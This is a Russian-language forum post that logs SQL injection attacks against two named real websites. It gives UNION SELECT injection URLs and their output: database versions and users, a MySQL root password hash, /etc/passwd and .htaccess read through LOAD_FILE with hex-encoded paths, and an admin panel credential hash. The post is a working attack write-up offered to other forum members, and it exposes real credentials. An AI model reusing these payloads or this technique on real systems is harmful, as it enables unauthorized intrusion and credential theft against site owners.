|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
cfs.bc.ca - PR6
Код:
http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
DB_Ver:5.0.45-log
DB_User:cfsbc_2005@localhost
DB:cfsbc_2005
Админка:
Код:
http://www.cfs.bc.ca/admin/
прочитал все что было мне в бд доступно, но пользователей не нашел 
================================================== =======================
cjsf.ca - PR5
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
DB_Ver:5.1.28-rc
DB_User: php@localhost
DB:cjsfsite
mysql.user
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9+from+mysql.user--
root:474b96d173b7c3b8
Читаем /etc/passwd
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9--
Админка тут(но как видим basic аторизация)
Код:
http://www.cjsf.ca/admin/
Сейчас поправим наше положение =) мы знаем где админка и знаем что нужно посмотреть где находится файл с паролями, а он в свою очередь прописан в .htaccess:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7,8,9--
Видим что наш файл по адресу:
/usr/local/etc/apache22/htusers
Читаем:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f6574632f61706163686532322f68747573657273),2,3,4,5,6,7,8,9--
И видим:
cjsf:E4DngOk3FmdhI
Вроде все =)
Последний раз редактировалось Kraneg; 19.02.2009 в 00:57..
|